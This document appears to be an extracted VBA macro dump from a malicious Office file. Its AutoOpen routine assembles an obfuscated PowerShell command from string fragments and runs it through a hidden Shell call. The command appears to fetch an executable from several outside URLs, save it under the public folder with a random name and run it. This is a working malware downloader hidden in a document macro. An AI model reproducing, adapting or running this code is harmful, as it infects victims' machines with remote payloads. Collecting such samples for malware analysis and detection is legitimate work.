Filename     : ./macros/fb9fc26235d7b3f7465a6da2d0a60ebf395785372d06a16c9f558b773b0b2c01
OLE stream   : Macros/VBA/btGXzLIfLi
VBA filename : btGXzLIfLi.bas
----------------------------------------
Attribute VB_Name = "btGXzLIfLi"
Sub AutoOpen()
On Error Resume Next
oauuKfrid = zTVtIsGSdGSX - Sgn(NEpMNprwEzz) - (2370919 - Tan(2744206) / 9993227 - ChrW(RwpDKp))
aJnaPAiGM = BQrjqVTipmqu - Sgn(WhtssAi) - (3315296 - Tan(2903471) / 2610887 - ChrW(nuBlzpIqrKzvW))
TYvfKNXzf = RtVHpFiXlCwt - Sgn(UhjAizDKYlXZUE) - (9732246 - Tan(1269575) / 249057 - ChrW(tHFkrchTlJmL))
Application.Run "ULfEMDIR", rCJMNTapIB
tYacbwdNt = cisIwiVAjRkMFl - Sgn(kpESLOtYMszw) - (8472168 - Tan(5713343) / 28349 - ChrW(nztibrjiz))
zkZVbjSom = IZuiljGfQzjd - Sgn(jowPLGOs) - (1218591 - Tan(5013416) / 3745211 - ChrW(dUClLj))
KGmrCtPIv = MSfPUNp - Sgn(iRHiXwCzbU) - (1397785 - Tan(2874928) / 596708 - ChrW(ESZXkslDADKtf))
End Sub
Function rCJMNTapIB()
On Error Resume Next
iDXVFFskN = YYEJkQDCZknh - Sgn(DqqBbqa) - (2228222 - Tan(935644) / 3096206 - ChrW(AXFojQKXjQzWv))
zONpJPvK = UcKzRvNZataWH - Sgn(vbiT) - (1637255 - Tan(1971208) / 1720900 - ChrW(LOVJZQ))
wVzThcHjh = CDUuGGNPNnUjaw - Sgn(OKJDc) - (1526539 - Tan(7273027) / 6107636 - ChrW(llHRwb))
KtEbnwb = GtYsJlH + Mid(vADFtNAr + "DAzkK9+8TE+8TEoA9d = oA9+oA9&oA9+'+'oA9(zfsn'+'zfs+zfsoA9+aG2+aG2oA9e8TE+8TEzoA9+oAaG2+aG29fs+zoA9+oA9fsw-obo8TE+8TEA9+oA9jecoA9+oA9zfs+8TE+8TEzfsoA9+oA9tzoA9+oA8TE+8TE9fCnOPkaADkdXPBZ" + BGuwRMIilB, 6, 165)
mJwTMAOziuF = RXGIVzwTmfzj - Sgn(YXHiICuvUzaIDq) - (3568260 - Tan(9193650) / 3180523 - ChrW(wJmG))
HjjNTG = ATiBksf - Sgn(ouj) - (8622796 - Tan(5355635) / 8530955 - ChrW(rTttwYfAR))
UsQCb = dXVYA - Sgn(MRFHPdBJD) - (8018379 - Tan(9708660) / 7356495 - ChrW(UzqDnP))
sXcTYLFuKt = VzcXpGcA + Mid(hLR + "jG2+aG2+ sh9NSoA9+oA9BoA9+oaG28TE+8TE+aG2'+'A9 + 8TE+8TE(oA9+oA9zfs.exzf8TE+8T'+'EsaG8TE+8T'+'E2+aG28TE+8TE+zfsYppcqrMpohGDTw" + ndiRwALAWo, 2, 110)
zwJukFTP = KTHMnwQJ - Sgn(jjW) - (9788439 - Tan(8847012) / 9487755 - ChrW(USaBMjCD))
IkporiwSzim = bjPfUAb - Sgn(RJCTJzR) - (9413932 - Tan(1657159) / 6289607 - ChrW(aDus))
oNENWrwh = pSB - Sgn(HJiR) - (740584 - Tan(8925960) / 2320071 - ChrW(BdiiEC))
ZEMidKpiTAD = PsKsUSNrHUJ + Mid(nTWbWkNNS + "RfBldWAzWwFRtYqhP);break;oA98TE+8TEaG2+aG28TE+8TE+oA9}catch{}}oA9).REplaCE(([CH8TE+8TEa8TE+8TEr]1'+'22'+'+[CHar]102+[CHar]115),[StrinG][CHar]39).REplaCE(o'+'A9qXC'+'oA9,[StrinG][CHar]92).REplaaG2+aVrbLHVrP" + qGatmzMnUhJ, 18, 180)
qfFUqnluz = WBMHFnHj - Sgn(CGfWaffcmnhkjr) - (5051580 - Tan(1202867) / 1719755 - ChrW(wjHJYBXGNTj))
paaRWmQiLMw = CuSWJ - Sgn(zPp) - (6706837 - Tan(1147201) / 4866200 - ChrW(qQomK))
AsEWrFjQuZn = BwBKwqthdzT - Sgn(LwdlmRN) - (6515896 - Tan(4790969) / 1329489 - ChrW(zNdiAikiUDhiM))
tXTUOiAJjw = kuCLVJEDzvdO + Mid(nPpBwULHil + "XT &( $vERboseprefEReNcE.tostriNg()[1,3]+'X'hCSdpZXNziOFlcp" + OlBviz, 3, 42)
DvlYJmRzunL = wsQzOiRRkCwiS - Sgn(ldcz) - (6848099 - Tan(975807) / 3887508 - ChrW(HMvbTjIzn))
cFQVsSqTca = XWV - Sgn(AVBPLOUbZ) - (8139453 - Tan(1908239) / 1738807 - ChrW(abzjD))
KqITYAmP = VlDDnLhI - Sgn(OuLwjIdGvUt) - (1069391 - Tan(1617830) / 6176230 - ChrW(FRKaiWoSTwz))
oMnjOBDh = kVfPUVQ + Mid(QudfFdW + "JuNikJvhsVXlvdTE9+oA9C);&(oA8TE+8ozNQJttwCQtd" + cNuDDwTI, 15, 19)
QjVKKHMCfv = zaTHaD - Sgn(ZlBlDJdmlfT) - (8425714 - Tan(502970) / 4503946 - ChrW(RlDnOqjQfV))
JXBbSZMmpS = uUmlIXSQjoOoXh - Sgn(zfAUpOrT) - (1789913 - Tan(6541552) / 740355 - ChrW(ouqUWPFOIzA))
NiwLLALhEG = wZmqrCzf - Sgn(ssDQ) - (2047517 - Tan(6125935) / 7017367 - ChrW(Add))
QIQXPAwMB = wRODiGhMffNZA + Mid(UDPJTNFQwWBGaQ + "wmFWanoaG2+aG2A9+oA9iganNgGtEaG2+aG2oA9+oA9(), oA9+oA9'+'soA9+oA9h9oA9+8TE+8TEoA9SDoA8TE+8KhJDJVTXVjUpmmZpp" + brzjRjohQ, 5, 86)
TZQrpQIwA = LjUL - Sgn(VwRL) - (9058110 - Tan(3048833) / 25626 - ChrW(KXMnjuYm))
OoUGMmHNA = PICYWShEiUD - Sgn(jpwHEc) - (6758426 - Tan(2263644) / 2500323 - ChrW(MAFvNLt))
ujjHXZzHbs = HORZUM - Sgn(jzdkH) - (2497977 - Tan(9133619) / 9339270 - ChrW(iiOj))
ipZwEOFTjf = kdWqUsZ + Mid(SMwfdYQ + "snBRzULXXEEaGWrtvGKhcaG2) ( (aG2.( nitveRBoSePREFErENcE.TosTRInG()[1,3]+oA9XoA9-joInoA9oA9) ((8TE+8TEoA9sh9oAaG2+aG29+oA'+'9noA9+oA9saoA9+oA9dasoAZRbt" + BcGkYjvBm, 22, 125)
sfPpcnWTJ = QEzRi - Sgn(NooZrAbPIQYYOw) - (8988975 - Tan(6614628) / 1498255 - ChrW(XNci))
zuRUwsC = pjzT - Sgn(fwTJaZzdYOH) - (1182524 - Tan(8743374) / 4293488 - ChrW(DFjMINiwquQT))
lHQrKIj = izqrjqkLzO - Sgn(ozRKsBRUGtCkCn) - (2117500 - Tan(4391384) / 9511881 - ChrW(dPK))
mRDsf = SoaZtwBSaFW + Mid(SNowG + "qWioA9+oA9htoA9+oA9tpoA9+oA9://oA9+oA9erste.voA9+oA9iaG2+aG2p/nH0oA9+oA9tN/zfs.aG2+aG2SoAjizCKkNODTA" + mzUdFbF, 4, 86)
UwMwYKAduL = VlUlsRUPvt - Sgn(PCZZwom) - (2590588 - Tan(8647523) / 6210962 - ChrW(JlLDjz))
oSrhoawVJH = mqwobbm - Sgn(DkftWkVUoTt) - (2542014 - Tan(2905010) / 6135064 - ChrW(ZpBFcj))
DNNaKqqOvQ = phUwJCWaa - Sgn(mNkBizJfnQXjpm) - (614216 - Tan(1297504) / 5686762 - ChrW(zaVKAdvz))
pTEzQKTkZ = SvYYPZC + Mid(dGqjXIwYDpc + "ZBrjlrAriRSbYNmZijEniNgBoA9+oA9iS/?Aa" + NlfPnEVTmLUzni, 23, 13)
ICGUGkDT = bAd - Sgn(NHGkbjEUT) - (1833861 - Tan(8171570) / 8943536 - ChrW(BLSiJ))
HdVjWXCkX = vUhaqEqfYt - Sgn(msRzpnFGOHVUzt) - (2904301 - Tan(9594875) / 4204944 - ChrW(qHVRShHfhQfkD))
sUOFD = aWXwcOMYMX - Sgn(aZzhjaHUnimbU) - (4961704 - Tan(6958934) / 8008610 - ChrW(FpaiD))
sdaQwBO = ZbSzNsvaCv + Mid(rprap + "IfG2+aG298TE+8TE6).REplaCE(([CHar]71+[CaG2+aG2Har]116+[CHar]69),[StrinG][CHa8TE+8TEr]34).REplaCE(([CHa8TE+8TEr]115+[CHar'+']104+[CHar]57),[Stri8TE+8TEnG][CHar]36) ) aG2).rEpLACE(aG2nita8TjhZEiItfiVCGzMuhdLdGwCdUviCzlUQWwS" + DFshtCZ, 3, 185)
diMkkvl = YCSXwQWkFEKKl - Sgn(GPrdwi) - (5418544 - Tan(6459618) / 2238855 - ChrW(ACPn))
CptKbopCPHj = GiTsdidzXAHUX - Sgn(tqf) - (7525190 - Tan(326631) / 1879744 - ChrW(wQGqQrqOXu))
BwMEDGNBN = jsz - Sgn(rRIfcQUd) - (8018903 - Tan(2613164) / 827843 - ChrW(SNVPNdJKRN))
SzLfOIXlR = udWQVHjSuzXrI + Mid(zBpY + "zaTE9+oA9zfaG2+aG2sInvozfsoA9+oaG2+aG2A'+'9+zfoA9+oA'+'9soA9+oA9kaG2'+'+aG2zoA9+'+'oA9fsoA9+oA9+oA9+o'+'A9zfseoA9+oA'+'9-IoA9+oA9toA9+'+'oA9emzfs'+')'+'(oA9+oA9soA9+oA9h9oA9+oA9SDCoA9+oA9GNAvpzEXWzOZRhHdLbTkZ" + QzouDY, 3, 185)
NsHtMlLzV = nGioDiQvnp - Sgn(UXjcYbuOHk) - (8266448 - Tan(9338121) / 8548468 - ChrW(iwZAiOkzaT))
FMiNaXGiDVl = zOTUwiirmH - Sgn(hAnkdl) - (8906748 - Tan(9072165) / 9260537 - ChrW(pGZhr))
hGDiuntr = IbuWzPzbMatLB - Sgn(FGbO) - (2967039 - Tan(4797643) / 2665291 - ChrW(kzDiXVHIunFnZ))
rOujqLBz = MrmlAFG + Mid(fDXzNiWjRbn + "twZQAPdoUniXlovpIzpple.oA9+oA8TE+8TE9coA9+oA9om/NCWtGdLp" + cLMYAC, 21, 29)
HujhLYiqj = vwWCVhHUljRX - Sgn(jVnGLYwRA) - (4757498 - Tan(4913277) / 8257445 - ChrW(WliiFNU))
fnajkj = PUvisJowjJLz - Sgn(wlRHXSSZu) - (4869967 - Tan(9447870) / 2203556 - ChrW(KVq))
rChfzq = dDCp - Sgn(AscSOIS) - (3791679 - Tan(2953275) / 2668217 - ChrW(taAMXivCOUuwT))
KFNZzpRtU = rkSRCLYDs + Mid(tnEjiKSShOr + "QwlAECboA9+oA9'+'J8TE+8TE/?http:oA9+oA9//oA9+oaG2+aG2A9abooA9+oA9ut.megao'+'A9+oA9xuoA9+oA9s.oA9+oA9c8TE+8T'+'EoA9+oAwhNvzKCcWHRLkBkbcj" + TSscUEjGFOiqO, 6, 112)
NzYbTmcVj = jvHAbzGtI - Sgn(OpJtjFzIz) - (3059860 - Tan(7490745) / 8474556 - ChrW(rsHtkPBiP))
lrPLLNl = iqkBuJcifWdpUz - Sgn(adSzmFqrRP) - (1568036 - Tan(3848495) / 1212160 - ChrW(iHszsiD))
PHzzE = EFwUlHVzCXJLKl - Sgn(icsozTlmpWJ) - (171848 - Tan(2899736) / 7169035 - ChrW(cSibZMBRTjVR))
kWqGQUNYWHp = zSIZfIukckZfE + Mid(KHb + "qPA][CHar]aiOzoivtMiSnZviOWdBTYmllMpiBdroOpijm" + jRIkV, 4, 8)
NYzwDsLPz = fcw - Sgn(rbTc) - (5415548 - Tan(5195424) / 9287790 - ChrW(trTr))
IWFspCTSjBY = PDAqTNbiB - Sgn(LbmZdsSdW) - (5681699 - Tan(9828818) / 2938875 - ChrW(sROGmDdpsjb))
qJtSnJ = wYKLOW - Sgn(qzIBqBSO) - (5268433 - Tan(2681765) / 9407441 - ChrW(dzQHYE))
TquDEXWjpZH = kKuKtXJW + Mid(qDfSTJwcGGOMuq + "QuofHOiWaUcUCjkdzfs+zaG2+aG2o8TE+8TEA9+oA8TE+8TE9fs-objectoA9+oA9zfs) System8TE+8TE.NetoA9+oA9.oA9+oA9aG2+aG2WeboA8TE+8TE9'+'+o8TE+8TEA9CloA9+oAaG2+aG29ient;sh9NoA9+oA9SB oA9+o8TE+8TEA9='+' soA9+oA9haG2+aG29ns'+'oAisPSIoSc" + iLWhLYEdBZ, 17, 198)
cWUcbpV = iRlHHh - Sgn(SNpGfqnuTvpHD) - (5135955 - Tan(5511712) / 4415576 - ChrW(jCVq))
zHAzoozIE = KXcNvwCV - Sgn(AZfGa) - (8948740 - Tan(1905359) / 8717412 - ChrW(jthfGL))
wkcNNDYOt = oFudbELEwDSiS - Sgn(qswlohYUCcwmo) - (7876070 - Tan(9300900) / 7682085 - ChrW(RQTGrHsjv))
aTYZPVI = piXmSuKK + Mid(THRHGaZnkQ + "NFQGwVdTjXt9ooA9+oA9'+'m/8TE+8TEoA9'+'+oA9v1/imaoA9+8TE+8TEoA9geoaG2+aG28TE+8TEA9+oA9soA9+oA9/oA9+oA9articoAaG2+aG29+oAaG2+aG29le/IoA9+oA9p8TE+8TEjKJT/?ho8TE+8TEA9+oA8TE+8TE9ttp:/oA9+oA9/wwwqjOsXfCwkB" + EToBbvSz, 12, 178)
krPtKI = ozlGBtUwKfATLV - Sgn(vEjAmwmopNvfqU) - (235306 - Tan(9593829) / 5330304 - ChrW(ciqQdtX))
iHYjuKRYU = ZKXSL - Sgn(uYMEpAaAB) - (2132041 - Tan(9213848) / 8621134 - ChrW(OdcJ))
YzYMSRikljk = YBirHfaqcd - Sgn(cQWBSkSH) - (9399610 - Tan(1588522) / 5289565 - ChrW(ccfUkmJfwApt))
bdQsc = bJWcfbSqB + Mid(uRdVUDSioQW + "oFFJSsQtNwddqRG2,[Str'+'i8TE+8TEnG][cHAr]39)) 8TE).replaCe((['+'ChAr]65+[ChAr]72+[ChAr]80),8TEmpa8TE).replaCe(([ChAr]97+[ChAr]71+[ChActfo" + IZAN, 15, 119)
UGsLYjRA = zcbadqX - Sgn(CaTJDtBDlv) - (8702578 - Tan(9560250) / 6160466 - ChrW(coQzAoo))
jnmROlPFRB = WnvEzwzUvARv - Sgn(usQs) - (3249916 - Tan(846447) / 2106273 - ChrW(PwGncznJjqjt))
PoLENtkujWG = DjNztC - Sgn(Rzsj) - (7005889 - Tan(2469984) / 6469856 - ChrW(AEjkdzGqoRXzKK))
vfpGzbMfo = uCQhdzXz + Mid(YuYrodKUM + "XqCQmnHwMvYhcSfiiMN9+oA98TE+8TEadaoA9+oA9sd.noA9+o8TE+8TEA9ext(10aG2+8TE+8TEaGWXCaKuZWBmUVE" + wKFOcLqE, 20, 59)
KSXHRNUBlk = rJbHzQR - Sgn(pZiWDwHjiwiSqj) - (9569100 - Tan(2086973) / 2344044 - ChrW(YXpmPOHjTA))
XURhij = CilctXdKAwHS - Sgn(VaUwbHMRvQ) - (8413456 - Tan(8711221) / 1453571 - ChrW(JTP))
bfNbtwpwU = dGvjQzqz - Sgn(UzLjR) - (999467 - Tan(1717145) / 3272118 - ChrW(uKFLoWGRtjlT))
JawALCXGi = JhBtqMCtW + Mid(EZQ + "PFhXKUwbUFtNjtuPhvBrhr]50),[sTrInG][ChAr]39) ) ')  -REPlACe  'mpa',[CHAR]36-REPlACe  '8TE',[CHAR]39) |JlYjmziH" + ZCP, 22, 81)
hBZdDqnzllK = awDGMsBI - Sgn(ImtXcdXEb) - (2925417 - Tan(9374822) / 1069873 - ChrW(kSvnhzRj))
ZiWwTUW = MtMOM - Sgn(ARDqIIY) - (7661568 - Tan(8987805) / 5176542 - ChrW(rBApD))
fwtjFotV = TDNlLZK - Sgn(ruw) - (5145317 - Tan(9982211) / 2219807 - ChrW(REEKLG))
LLlzpH = rkbiLloKW + Mid(dvrR + "ibrtWwjojUlbdnQtLKA9aoA9+oA9tihhakaoA8TE+8'+'TE9+oA9nince8T'+'E+'+'8TEo8TE+8TEA9+oA9.oA8TE+8TE9+oA9xyaG2+aG2z/qffpQ" + haowmVZERSS, 19, 93)
hrhKZKYAhm = cSDTXPS - Sgn(SjAmRFw) - (5533994 - Tan(6108822) / 3626107 - ChrW(pRIWWwbifFp))
HfOCzw = zwvSwrGZjMZw - Sgn(nPoEQKRIinAT) - (9287033 - Tan(6408348) / 4360176 - ChrW(knMcrBpWnAlYt))
TtYaJqmKfOw = dsL - Sgn(ihnZOvYjVI) - (9019509 - Tan(9820914) / 42692 - ChrW(kivZM))
IQMhsd = OMiAMXFPjUIXsK + Mid(hossnQNaNuPuaw + "Qezfs)8TE+8TEoA9+oA98TE+8TE;oA9+o8TE+8TEA98TE+8TEf8TE+8TEooA9+oA9reach(oA9+'+'oA9sh9aoA9+oA9s8TE+'+'8TEfc in sh9ADCX){oA9'+'+oA9toA9+oA8TE+8TE9aG2+aG2roA9+oA9y{sh9YYU.GtaG2'+'+aG8TE+8TE2oA8TE+8TE9'nJCRPWlonpENRzPqFMiiBkciCHIM" + irPWoBGKNnzbOd, 2, 196)
UAABHoC = jhboz - Sgn(oOHDjsiwH) - (4198459 - Tan(1623261) / 9760800 - ChrW(fQuzmrkL))
iEvLJG = WkBuPnGspdQwD - Sgn(THb) - (3013128 - Tan(6229218) / 301214 - ChrW(mCZuYuljow))
pzsoAs = QusWCl - Sgn(vqOffiZcP) - (5253347 - Tan(8154378) / 2100146 - ChrW(EJMjibAqs))
hVCZdD = wmZRRQYsPa + Mid(IHPwp + "qWcLQiVmjjFUJUsiiNtvqvoXfIjLioA9'+'+oA9 + zfsqXCzf8TE+8TEs 8TE+8TEoA9+oAaG2+aG29aXE" + LYRE, 30, 52)
iiqSzdq = WFi - Sgn(htSHflUoTzsdKk) - (6141971 - Tan(8867791) / 2801120 - ChrW(PXLqZ))
wvwvFiB = zHiGAhoOb - Sgn(JadWfHJj) - (8190527 - Tan(1437279) / 8038486 - ChrW(ipEsoMpHnq))
SXCCNSjRHD = rIXHNol - Sgn(dClbE) - (3116512 - Tan(8442644) / 5911329 - ChrW(NiAS))
qbCPS = JBjBjJIwEq + Mid(kKTGXqUwiKt + "UbhZZUUzvYCHLzUiwpzVRXiw (('. '+'( ([StRInG]mpaVERBoSePreFERenCe)[1,3]+8TEX8TE-JOIn8TE8TE)(Fz" + VKGiIoakm, 25, 67)
QlXZfK = iEizJzddXIRmv - Sgn(ZrkaBjz) - (8909497 - Tan(8583788) / 4859824 - ChrW(bFhaNhjLM))
ZjGZlIPWiw = IusECw - Sgn(KYcVvfj) - (9413148 - Tan(1860496) / 8431110 - ChrW(AuoLJ))
UrWUjSqC = hrwDJaib - Sgn(HRwrVzhijTw) - (1531018 - Tan(6211091) / 5056857 - ChrW(dDp))
QzZKt = UdoBItbZTlSH + Mid(OHAvrEwMdsN + "tQrB-joiN'')PhZzjcfE" + cwhjuIqBFouSMj, 5, 8)
zWbCROsqAbD = SQErM - Sgn(BRuZGk) - (1933896 - Tan(3109093) / 3366159 - ChrW(ULVwpfPjVB))
ffpnpM = TCmclT - Sgn(sBVFY) - (1544044 - Tan(4275736) / 8653491 - ChrW(puOk))
sBiIRZUdzio = uqupwXWnB - Sgn(WLAhPIw) - (3942206 - Tan(3142163) / 9466012 - ChrW(QMOmNcwX))
QMiTqXwvqj = LRZwlWXKCP + Mid(wuu + "QhN(8TE &'+' ((gEt-vAriaBLe aG2*mdR*aG2).nAME[3,11,2]-jOiNaG2ltwBQcRcjUDwAHCMPYoI" + YOARV, 4, 58)
arstAX = QIDRJfTGTQMfY - Sgn(nSYj) - (2847888 - Tan(1745173) / 5760117 - ChrW(uhLkGBQoY))
ISRvwNrFa = TTrjZhj - Sgn(ijmORzidHHruR) - (1206713 - Tan(3037268) / 7418475 - ChrW(WFYYSq))
pwviRUd = rtMEOGsrzT - Sgn(zqfQLGdtIw) - (5702427 - Tan(205199) / 2564271 - ChrW(ETD))
JczltL = oGRkZLrnpw + Mid(EAziNHpdwsZz + "bGjEHkrG2CE(([CHar]103+[CHa8TE+8TEr]978TE+8TE+[CHa'+'8TE+8TEr]110),[Str8TE+8TEinGztbsT" + GiifCivaQbjP, 8, 74)
UtkBt = Kmp - Sgn(nzTGiI) - (8551681 - Tan(4690640) / 6346729 - ChrW(rtwjDm))
tQiqCRzJb = IlziramJaJf - Sgn(YDOZkJAHLMZN) - (4117248 - Tan(7221272) / 6171706 - ChrW(nlhpNPBBrh))
iwqGFLOuv = WjzIzNjILcTLWC - Sgn(ZvMjMGuEV) - (7791814 - Tan(5361117) / 7976196 - ChrW(JCNiDOdaN))
qGDBkUG = KWLqIXXnZOB + Mid(AzzbSv + "GLdoA9+oA9soA9+oA9)oaG2+aG2A9+oA9aG2+aG2 oA9+oA9randoA9+oA9om;8TE+8TEsoA9+oA'+'9h9oA9+oA9YYU = .oA9+oA9(za'+'G2+aG2fsneoA9+oA9zfoA8TE+8TE9+oA9s+zfso'+'A9+oA9whNkiAOcUwkdvIlfLPB" + GtSvZhiNsz, 4, 155)
LaAjEZzS = ZDMr - Sgn(jbcaABORCsU) - (9387751 - Tan(4722273) / 4968129 - ChrW(YBzljCcciLp))
DBqEHzVYfM = RCMfdNBZtM - Sgn(baF) - (1229227 - Tan(4055049) / 3089286 - ChrW(MqLZkYEaHk))
wZjsVTD = wwOL - Sgn(wPpMrjW) - (153076 - Tan(7934161) / 2297739 - ChrW(XLivHMzzwVsRob))
bSJwmbSusk = ZAldUET + Mid(KmipFoIU + "iBlVrZaiPzTVoiA9EoA9+oA9DoA9+oA9ooA9+oA9ganWoA9+oA9nlganoA9+oA9OadFIganleoA9+oA9GtE8TE+8TE(oAaG2+aG29+oA98TE+8TEsoA9+oA9h9aoA9+oA9sfc.GtEToStrgGfAbvlBQffMjqch" + bbcUXXIwIPlI, 15, 129)
GBFjfwPfj = ONwEzBlodFiuwL - Sgn(FVEc) - (1827660 - Tan(2336042) / 4414479 - ChrW(KItQuocbS))
lnFajwLA = OZDHE - Sgn(dSzzOcpZNZJIk) - (4546178 - Tan(5408870) / 7507929 - ChrW(jnvDlqAAdQkj))
IrZtpQVHUJ = EzQKwrNXOiS - Sgn(DViUruh) - (5298543 - Tan(6647277) / 3789378 - ChrW(Iqsbwwl))
VbSfjj = FRSvNnQ + Mid(IrfD + "wGzYzzEzOtrzSmzUdXYwjUjWqslRz+'+oYaEbnG" + cULkYYjOdpzl, 30, 4)
mRbwJRpNp = POYd - Sgn(NdbATdQV) - (9362787 - Tan(310366) / 2809305 - ChrW(OfHKHdSwqCiXkh))
XIJMTijEzMc = HUVLvqjQGGU - Sgn(DWA) - (1268141 - Tan(1231940) / 7832818 - ChrW(PdLuIlGffLu))
bzmlYIzfF = Pmu - Sgn(AbqTI) - (5853119 - Tan(2830563) / 254876 - ChrW(maOc))
KpvWXAd = FqbVLraZ + Mid(ZTUFdjiUVjm + "iE+8TEG'+'2,aG2AHPaG2).rEpLACE('+'aG2o'+'A9asvPwHCSRTf" + DIDkiIT, 2, 43)
HjHQj = lOKpVKrCo - Sgn(SUPUoN) - (5221633 - Tan(2903803) / 3091654 - ChrW(zZJqChKFP))
MifbmipnSm = QLNXfrkjqPwJ - Sgn(pshpvU) - (9933689 - Tan(4659389) / 3048896 - ChrW(sfL))
QjjVZVY = UnnA - Sgn(mzzHHsozcrY) - (134723 - Tan(6017565) / 7681444 - ChrW(TwVsP))
EmpwR = vbjzRFvZMapLE + Mid(LCEQ + "OIw.oA9+oA9umbriawifioA9+oA9.oA9+oA9itoA9+oA9/oA9+oaG2+aG2A9Ue8J/?http:o'+'A9+oA8TE+8TE9//wwwoA9+oA9.foA9+oWWjaDOlsEmlEwQA" + NziQV, 3, 105)
YqiSpjDi = Xfw - Sgn(mAULLvVlSRsdNv) - (9337479 - Tan(1629011) / 2788358 - ChrW(lJMIATAudHiMw))
VmzlwiJ = spnvmLLlWOu - Sgn(IIIXwcli) - (8720124 - Tan(7966226) / 6876556 - ChrW(AAKRRNGFS))
KcFbYiz = lYIB - Sgn(ChAmzNaK) - (8557958 - Tan(7244038) / 1209505 - ChrW(CbUtC))
TMiAcw = PSALVrUmQwCP + Mid(WRqkZ + "LXHzojWSfjA9+oA9poA9+oA9lioA9+oA9t(zfoA9'+'+oA9s?zfs);sh9SDC'+'oA9+oA9aG2+aG2 ='+' sh9env:pub8TE+8TElicaEBc" + GWXjrzMrBlWSvk, 12, 92)
rnzawjFD = fLEEiwN - Sgn(SzGkBnjiqZ) - (3839135 - Tan(1631989) / 4098453 - ChrW(rMv))
IiUFQ = XzATsVvjOIECJ - Sgn(poRP) - (8306818 - Tan(4217504) / 6317230 - ChrW(MXvqF))
SmbLWZwicvC = wiUsJmbNiz - Sgn(kpSY) - (4591929 - Tan(5008141) / 7707078 - ChrW(LTjjbU))
OSLfic = JulBuTI + Mid(oGCX + "SjNHFKFhfHKziwJtwpf208TE+8TEoA9+oA900oA9+oA9, 2oA9+oA98213oA9+oA9aG2+aG23)oA9+aG2+aG2oA9;s'+'h9AoA9+oA9'+'D'+'CX = zoA9+oA9fsoA9+oA9 oA9+8T'+'E+8TEoA9 http:oA9+oA9/oA'+'9+oA'+'9/tceoA9+oA9eLfbqAUZdrdv" + PzGiztClQZq, 20, 170)
rCJMNTapIB = cRZLJmTHPUU + LMncYBPNmk + uITnMLmpAIilR + ChrW(34) + MtXjcGSJGjOlo + qbCPS + QMiTqXwvqj + ipZwEOFTjf + KtEbnwb + qGDBkUG + TquDEXWjpZH + vfpGzbMfo + OSLfic + rOujqLBz + KFNZzpRtU + aTYZPVI + EmpwR + LLlzpH + pTEzQKTkZ + mRDsf + TMiAcw + hVCZdD + sXcTYLFuKt + IQMhsd + VbSfjj + bSJwmbSusk + QIQXPAwMB + oMnjOBDh + SzLfOIXlR + ZEMidKpiTAD + JczltL + kWqGQUNYWHp + sdaQwBO + KpvWXAd + bdQsc + JawALCXGi + tXTUOiAJjw + QzZKt
zHbuOQvsX = aOZGbEVbjoj - Sgn(usiraR) - (3462927 - Tan(2815608) / 8643564 - ChrW(awiQaVzWpvpKwS))
CAqEkFhzF = MiPXpdaIqdn - Sgn(bKdAcKzoY) - (6975120 - Tan(9310924) / 2454350 - ChrW(ZaNdnPdsuEsF))
cjLUjUSia = jbkdXzRL - Sgn(lCiQCNiCN) - (1989007 - Tan(6668364) / 6493484 - ChrW(luzi))
End Function
Sub ULfEMDIR(cnFsjsjhtnQRV As String)
On Error Resume Next
nvDtQiWHu = binoDRuB - Sgn(SSNMqwdzua) - (3210273 - Tan(706280) / 4478106 - ChrW(TOEXarkjm))
KtzowDilF = daM - Sgn(iNwmjbjd) - (4176768 - Tan(902291) / 866464 - ChrW(ZwuTJwl))
jDStHhtMp = BtDGp - Sgn(KiEEFGjX) - (8599266 - Tan(6980376) / 5234217 - ChrW(krmshpjWP))
Shell cnFsjsjhtnQRV, 0
UpEmPqSUL = Okc - Sgn(pFrjZWvAXGP) - (5428937 - Tan(9624622) / 4688640 - ChrW(LNZSG))
qozRpPNDh = MtHHwnpIHzU - Sgn(RwXnsuL) - (9967029 - Tan(7554172) / 7998377 - ChrW(WuAFaqJ))
IrSotWUrb = VFRTlWXB - Sgn(CWTshvWbkMwiP) - (3520151 - Tan(9560880) / 8230887 - ChrW(BdEASBTpi))
End Sub
